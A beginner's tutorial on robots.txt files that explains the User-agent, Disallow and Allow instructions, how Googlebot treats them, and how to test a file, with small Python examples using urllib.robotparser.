
robots.txt: what it is and how to use it


What do they do exactly?

A robots.txt file gives your instructions to search engine robots.

The first thing a search engine spider looks for when it visits a website is the robots.txt file. It looks for it because it wants to know what it should do. If you have instructions for a search engine robot, this file is where you give them.
The most common problem people have with robots.txt files is that they don't know how to make them.

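If you can make web pages, you can also make a robots.txt file. The file is a plain text file, which means that you can use Notepad, WordPad (saving as plain text), or any other plain text editor. You can also make one in FrontPage or Dreamweaver by using the "code" view. You can even copy and paste one. Note that the file must be named robots.txt (with an "s") and placed in the top-level folder of your website, because that is the only name and place robots look for.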

So instead of thinking "I am making a robots.txt file", just think "I am writing a note". They are exactly the same process. However you would write a note or a letter on your computer will work for the robots.txt file.

What should the robots.txt file say?

That depends on what you want it to do.

Most people want robots to visit everything in their website. If this is the case with you, and you want the robot to index all parts of your site, there are three options to let the robots know that they are welcome.
1) Do not have a robots.txt file
If your website does not have a robots.txt file then this is what happens -
A robot comes to visit. It looks for the robots.txt file. It does not find it because it isn't there. The robot then feels free to visit all your web pages and content because this is what it is programmed to do in this situation.
2) Make an empty file and call it robots.txt
If your website has a robots.txt file that has nothing in it then this is what happens -
A robot comes to visit. It looks for the robots.txt file. It finds the file and reads it. There is nothing to read, so the robot then feels free to visit all your web pages and content because this is what it is programmed to do in this situation.
3) Make a file called robots.txt and write the following two lines in it... (these are "instructions" for the robot to follow)

User-agent: *
Disallow:
If your website has a robots.txt file with these instructions in it then this is what happens -

A robot comes to visit. It looks for the robots.txt file. It finds the file and reads it. It reads the first line. Then it reads the second line. The robot then feels free to visit all your web pages and content because this is what you told it to do.
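
The empty file and the two-line file can be compared with Python's standard-library urllib.robotparser module. This is only a minimal sketch: the robot name "ExampleBot" and the example.com address are made-up placeholders, and real search engine robots may differ in small details from Python's parser. Option 1 (no file at all) needs a live web server, so it is not shown here.

```python
from urllib.robotparser import RobotFileParser


def is_allowed(robots_txt: str, url: str, robot: str = "ExampleBot") -> bool:
    """Return True if the given robots.txt text lets `robot` fetch `url`."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(robot, url)


# Hypothetical page, used only for illustration.
page = "https://www.example.com/photos/mycar.jpg"

empty_file = ""                           # option 2: an empty robots.txt
allow_all = "User-agent: *\nDisallow:\n"  # option 3: the two-line file

print(is_allowed(empty_file, page))  # True
print(is_allowed(allow_all, page))   # True
```

Both files give the same answer, which is why either one works as a "welcome" sign.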

What do the robot instructions mean?

Here is an explanation of what the different words mean in a robots.txt file.
User-agent:
The "User-agent" part is there to specify directions to a specific robot if needed. There are two ways to use this in your file.

If you want to tell all robots the same thing, you put a "*" after "User-agent:". It would look like this...
User-agent: *
(This line is saying "these directions apply to all robots")

If you want to tell a specific robot something (in this example Googlebot), it would look like this...
User-agent: Googlebot
(This line is saying "these directions apply to just Googlebot")
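
To see how a robot picks the directions meant for it, here is a small sketch using Python's standard-library urllib.robotparser. The "/drafts" folder, the robot name "SomeOtherBot" and the example.com address are assumptions made up for this illustration. The "Disallow" lines are explained in the next part.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical rules: Googlebot is kept out of /drafts,
# every other robot may visit everything.
ROBOTS_TXT = """\
User-agent: Googlebot
Disallow: /drafts

User-agent: *
Disallow:
"""

parser = RobotFileParser()
parser.parse(ROBOTS_TXT.splitlines())

url = "https://www.example.com/drafts/post.html"  # made-up page
googlebot_ok = parser.can_fetch("Googlebot", url)
other_ok = parser.can_fetch("SomeOtherBot", url)

print(googlebot_ok)  # False: the Googlebot directions apply
print(other_ok)      # True: the "*" directions apply
```

Note the blank line between the two groups. It separates the directions for one robot from the directions for the next.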
Disallow:
The "Disallow" part is there to tell the robots which folders they should not look at.

This means that if, for example, you do not want search engines to index the photos on your site, you can place those photos into one folder and exclude it.

Let's say that you have put all these photos into a folder called "photos". Now you want to tell search engines not to index that folder.

Here is what your robots.txt file should look like:

User-agent: *
Disallow: /photos

The above two lines of text in your robots.txt file would keep robots from visiting your photos folder. The "User-agent: *" part is saying "this applies to all robots". The "Disallow: /photos" part is saying "don't visit or index my photos folder".
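
The effect of these two lines can be tried out with Python's standard-library urllib.robotparser. This is a sketch, not a guarantee of how every robot behaves. The robot name "ExampleBot", the example.com address and the file names are placeholders invented for the example.

```python
from urllib.robotparser import RobotFileParser

parser = RobotFileParser()
parser.parse(["User-agent: *", "Disallow: /photos"])

base = "https://www.example.com"  # hypothetical site

# Ask, for each made-up path, whether a robot may fetch it.
checks = {
    path: parser.can_fetch("ExampleBot", base + path)
    for path in ("/photos/beach.jpg", "/photos.html", "/about.html")
}

for path, allowed in checks.items():
    print(path, allowed)
```

The photo inside the folder is blocked and /about.html is allowed. The page /photos.html is blocked too, because "Disallow: /photos" matches every address that starts with "/photos". If you only want to exclude the folder, writing "Disallow: /photos/" with a trailing slash is the safer choice.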

Googlebot specific instructions

The robot that Google uses to build its search index is called Googlebot. It understands a few more instructions than some other robots. The instructions it follows are well defined in the Google help pages.

In addition to "User-agent" and "Disallow", Googlebot also uses...
Allow:
The "Allow:" instruction lets you tell a robot that it is okay to see a file in a folder that has been "Disallowed" by other instructions.

To illustrate this, let's take the above example of telling the robot not to visit or index your photos. We put all the photos into one folder called "photos" and we made a robots.txt file that looked like this...
User-agent: *
Disallow: /photos

Now let's say there is a photo called mycar.jpg in that folder that you want Googlebot to index. With the Allow: instruction, we can tell Googlebot to do so. It would look like this...

User-agent: *
Disallow: /photos
Allow: /photos/mycar.jpg
This would tell Googlebot that it can visit "mycar.jpg" in the "photos" folder, even though the "photos" folder is otherwise excluded.
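
Why does the Allow line win here? Google's help pages describe the rule as: the most specific matching instruction (the one with the longest path) applies, and if two are equally long the less restrictive one applies. The function below is a simplified sketch of that rule written for this article, not Google's own code. The name allowed_by_longest_match is made up, and wildcards such as "*" and "$" are ignored. Python's built-in urllib.robotparser checks rules in file order instead, so it is not used here.

```python
def allowed_by_longest_match(rules, path):
    """Decide whether `path` may be visited.

    `rules` is a list of (instruction, path_prefix) pairs, for example
    ("Disallow", "/photos"). The longest matching prefix wins; on a tie
    "Allow" wins. With no matching rule the path is allowed.
    """
    best_length = -1
    allowed = True
    for instruction, prefix in rules:
        if not prefix or not path.startswith(prefix):
            continue  # an empty path or a non-matching rule has no effect
        is_allow = instruction.lower() == "allow"
        longer = len(prefix) > best_length
        tie_for_allow = len(prefix) == best_length and is_allow
        if longer or tie_for_allow:
            best_length = len(prefix)
            allowed = is_allow
    return allowed


rules = [("Disallow", "/photos"), ("Allow", "/photos/mycar.jpg")]

print(allowed_by_longest_match(rules, "/photos/mycar.jpg"))  # True
print(allowed_by_longest_match(rules, "/photos/other.jpg"))  # False
print(allowed_by_longest_match(rules, "/index.html"))        # True
```

Only mycar.jpg gets through, because "/photos/mycar.jpg" is a longer and more specific match than "/photos".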
Testing your robots.txt file
If you use Google's webmaster tools (for example, to submit a sitemap), you can log in and see if Google is having any issues crawling your site. There is also a robots.txt tool that allows you to experiment a little, letting you know if there are any problems with your file prior to putting it online.
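
You can also do a rough check on your own computer before uploading the file. The sketch below uses Python's standard-library urllib.robotparser. The function name blocked_paths and the list of pages are assumptions invented for this example, and Python's parser is only an approximation of what Googlebot does, so treat the result as a first sanity check.

```python
from urllib.robotparser import RobotFileParser


def blocked_paths(robots_txt, must_be_crawlable, robot="Googlebot"):
    """Return the paths from `must_be_crawlable` that the file would block."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return [p for p in must_be_crawlable if not parser.can_fetch(robot, p)]


# A common mistake: "Disallow: /" shuts robots out of the whole site.
draft = "User-agent: *\nDisallow: /\n"

# Hypothetical pages that you definitely want search engines to visit.
important = ["/", "/index.html", "/photos/mycar.jpg"]

print(blocked_paths(draft, important))
```

If the printed list is not empty, the draft file would keep robots away from pages you care about, and it should be fixed before it goes online.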

Key Concept:


- If you use a robots.txt file, make sure it is correctly written because an incorrect robots.txt file can block the bots that index your website.
